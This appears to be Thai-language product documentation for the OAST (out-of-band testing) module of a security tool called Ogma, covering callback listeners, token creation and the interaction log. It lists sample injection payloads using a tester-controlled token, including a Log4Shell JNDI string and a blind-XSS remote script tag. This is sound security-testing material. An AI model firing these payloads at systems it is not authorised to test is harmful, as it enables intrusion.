ข้ามไปยังเนื้อหา

OAST ​

OAST (การทดสอบความปลอดภัยของแอปพลิเคชันนอกช่องทาง) ตรวจหาช่องโหว่ที่ไม่สร้างการตอบกลับที่มองเห็นได้ โดยเป้าหมายจะสร้างการเชื่อมต่อขาออกไปยังตัวรับการเชื่อมต่อที่คุณควบคุมแทน ซึ่งช่วยยืนยันปัญหา

วิธีการทำงาน ​

Ogma เรียกใช้ตัวรับการเชื่อมต่อภายในเครื่องสำหรับหลายโปรโตคอล เมื่อแอปพลิเคชันเป้าหมายติดต่อตัวรับใดตัวรับหนึ่ง ระบบจะบันทึกปฏิสัมพันธ์พร้อม IP ต้นทาง เวลาที่บันทึก ข้อมูลที่ได้รับ และโทเค็นที่ฉีดเข้าไป

โปรโตคอลของตัวรับการเชื่อมต่อ ​

โปรโตคอลพอร์ตเริ่มต้นการใช้งาน
HTTPกำหนดค่าได้SSRF, XSS แบบบอด, เว็บฮุก
HTTPSกำหนดค่าได้SSRF ผ่าน TLS
DNSกำหนดค่าได้การฉีดแบบบอด, XXE, log4shell
SMTPกำหนดค่าได้การฉีดส่วนหัวอีเมล, SSRF ไปยังบริการอีเมล

กำหนดค่าพอร์ตของตัวรับการเชื่อมต่อและชื่อโดเมนที่ใช้ในโทเค็นที่สร้างขึ้นในแผงการตั้งค่า OAST

การสร้างโทเค็นคอลแบ็ก ​

  1. เปิด เครื่องมืออรรถประโยชน์ > OAST
  2. คลิก + ใหม่ แล้วคลิก สร้าง แต่ละโทเค็นไม่ซ้ำกันสำหรับแต่ละการทดสอบ
  3. คัดลอกโทเค็น โทเค็นมีโดเมนของตัวรับการเชื่อมต่อและตัวระบุที่ไม่ซ้ำกัน เพื่อให้จับคู่ปฏิสัมพันธ์กลับไปยังการทดสอบนั้นได้

ตัวอย่างรูปแบบโทเค็น: [unique-id].[your-oast-domain]

การใช้โทเค็นในเพย์โหลด ​

ฉีดโทเค็นคอลแบ็กลงในฟิลด์ใดก็ได้ที่แอปพลิเคชันอาจใช้สร้างการเชื่อมต่อขาออก:

  • SSRF: ใช้โทเค็น HTTP/HTTPS เป็น URL เป้าหมาย: https://[token]/
  • XXE: อ้างอิงโทเค็นใน DOCTYPE หรือ URL ของเอนทิตีภายนอก
  • Log4Shell: ใส่ไว้ในส่วนหัว: ${jndi:ldap://[token]/a}
  • XSS แบบบอด: ฉีดเป็น src ของสคริปต์: <script src="https://[token]/x.js"></script>
  • การฉีด SMTP: ใช้เป็นที่อยู่ปลายทางหรือ URL ในส่วนหัวอีเมล

บันทึกปฏิสัมพันธ์ ​

แผงปฏิสัมพันธ์แสดงคอลแบ็กทุกรายการที่ได้รับ:

คอลัมน์คำอธิบาย
เวลาเวลาที่ได้รับปฏิสัมพันธ์
โปรโตคอลHTTP, HTTPS, DNS หรือ SMTP
IP ต้นทางที่อยู่ IP ที่สร้างการเชื่อมต่อ
โทเค็นโทเค็นที่ถูกติดต่อ
ข้อมูลพาธคำขอ ชื่อที่สอบถามใน DNS หรือข้อมูล SMTP

คลิกแถวใดก็ได้เพื่อดูรายละเอียดปฏิสัมพันธ์ทั้งหมด รวมถึงส่วนหัวและเนื้อหาคำขอเมื่อมีข้อมูลเหล่านั้น

การจับคู่ปฏิสัมพันธ์กับการทดสอบ ​

เพราะแต่ละโทเค็นไม่ซ้ำกัน คุณจึงฉีดโทเค็นต่างกันลงในพารามิเตอร์หรือคำขอที่ต่างกัน แล้วระบุได้อย่างชัดเจนว่าจุดฉีดใดทำให้เกิดคอลแบ็ก

ซอฟต์แวร์กรรมสิทธิ์ สงวนลิขสิทธิ์